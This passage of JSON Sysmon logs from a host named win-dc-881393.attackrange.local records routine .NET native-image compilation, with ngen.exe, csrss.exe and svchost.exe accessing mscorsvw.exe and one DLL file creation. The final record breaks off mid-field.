{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7870,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.622\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-001042DD1100}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.622","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-001042DD1100}","TargetProcessId":"4576","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7871,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.622\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-001042DD1100}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.622","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-001042DD1100}","TargetProcessId":"4576","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7872,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.622\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-001042DD1100}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.622","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-001042DD1100}","TargetProcessId":"4576","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7873,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:10.856\r\nProcessGuid: {A837DB8D-04EA-5F25-0000-001042DD1100}\r\nProcessId: 4576\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11e0-0\\System.Web.Entity.Design.dll\r\nCreationUtcTime: 2020-08-01 06:00:10.856","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:10.856","ProcessGuid":"{A837DB8D-04EA-5F25-0000-001042DD1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11e0-0\\System.Web.Entity.Design.dll","CreationUtcTime":"2020-08-01 06:00:10.856","EventReceivedTime":"2020-08-01 06:00:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7874,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.903\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-00103BE21100}\r\nTargetProcessId: 5080\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.903","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-00103BE21100}","TargetProcessId":"5080","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7875,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.903\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-00103BE21100}\r\nTargetProcessId: 5080\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.903","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-00103BE21100}","TargetProcessId":"5080","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7876,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.903\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-00103BE21100}\r\nTargetProcessId: 5080\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.903","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-00103BE21100}","TargetProcessId":"5080","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7877,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.981\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-00104EE71100}\r\nTargetProcessId: 4836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.981","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-00104EE71100}","TargetProcessId":"4836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7878,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.981\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-00104EE71100}\r\nTargetProcessId: 4836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 